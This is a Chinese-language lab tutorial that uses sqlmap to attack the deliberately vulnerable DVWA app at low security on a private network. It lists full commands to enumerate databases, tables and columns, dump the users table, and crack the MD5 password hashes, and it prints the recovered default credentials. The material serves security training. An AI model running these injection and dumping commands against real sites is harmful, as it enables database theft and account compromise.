文章目录
1.概述用VirtualBox搭建kali
1-1.点击设置
1-2.注意:网络要打上勾,否则系统启动时没有连接到网卡
1-3.打开网络的接入网线,否则不能连接网卡上网
1-4.连接方式,我选择网络地址转换(NAT),因为可以上外网,也可以连接局域网
2.更多渗透测试文章参考
请看以下链接:
3.概述用VMware Workstation搭建DVWA
我为了方便,用shell脚本部署,请参考以下链接:
4.拓扑图的展示
5.设置DVWA的安全等级
5-1.点击DVWA Security
5-2.设置安全等级为low(最低级),然后点击提交(Submit)
6.提交DVWA的注入点,进行渗透测试
6-1.点击SQL Injection
6-2.提交ID为10的注入点
6-3.查看你URL的链接发生了变化
7.使用sqlmap检索DVWA数据库和用户
7-1查看Kali的IP地址
7-2.ping一下DVWA服务的IP地址是否能通
7-3.在浏览器打开F12–>点击Network–>点击?id=10&Submit=Submit–>查看Cookie值
7-4.进行sqlmap注入
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -b --current-db --current-user
参数说明:
--cookie : 是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息
-u : 指定目标URL,syql注入点
-b : 获取DBMS banner(DBMS:Database Management System 数据库管理系统)
--current-db : 获取当前数据库
--current-user :获取当前用户
7-5.查看到DVWA的用户和数据库的信息,一直选着y就行了
8.使用salmap枚举用户和用户密码
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' --users --password
参数说明:
--users : 枚举DBMS用户
--password : 枚举DBMS用户密码的MD5
8-1.查看枚举用户和用户密码的MD5
8-2.选择字典,1为默认系统自带的字典,2自定义字典,3带有字典的文件
8-3.可以查看到用户的密码
9.使用sqlmap枚举用户所有的数据库名称
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' --dbs
参数说明:
--dbs 枚举DBMS中的所有数据库
9-1.查看数据库名
10.使用sqlmap枚举DVWA的数据表
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa --tables
参数说明:
-D 指定枚举的DBMS数据库
--tables 枚举DBMS数据库中的数据表
10-1.查看dvwa的数据库中的数据表
11.使用sqlmap枚举数据表中的字段
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa -T users --columns
参数说明:
-T : 指定枚举的DBMS数据表
--columns : 枚举DBMS数据表中的所有字段
11-1.查看dvwa数据库中的users数据表中的字段
12.拖库
sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa -T users -C user,password --dump
参数说明:\
-D: 指定枚举的DBMS数据库
-T: 指定枚举的DBMS数据表
-C: 要枚举的DBMS数据表中的列(数据)
--dump: 转储DBMS数据表项
12-1.选择字典,1为默认系统自带的字典,2自定义字典,3带有字典的文件
12-2.这里我选着了默认字典
12-3.查看user和password字段的数据
#拖库成功,可以查看到数据的文件
cat /root/.sqlmap/output/172.25.0.100/dump/dvwa/users.csv
user,password
1337,8d3533d75ae2c3966d7e0d4fcc69216b (charley)
admin,5f4dcc3b5aa765d61d8327deb882cf99 (password)
gordonb,e99a18c428cb38d5f260853678922e03 (abc123)
pablo,0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)
smithy,5f4dcc3b5aa765d61d8327deb882cf99 (password)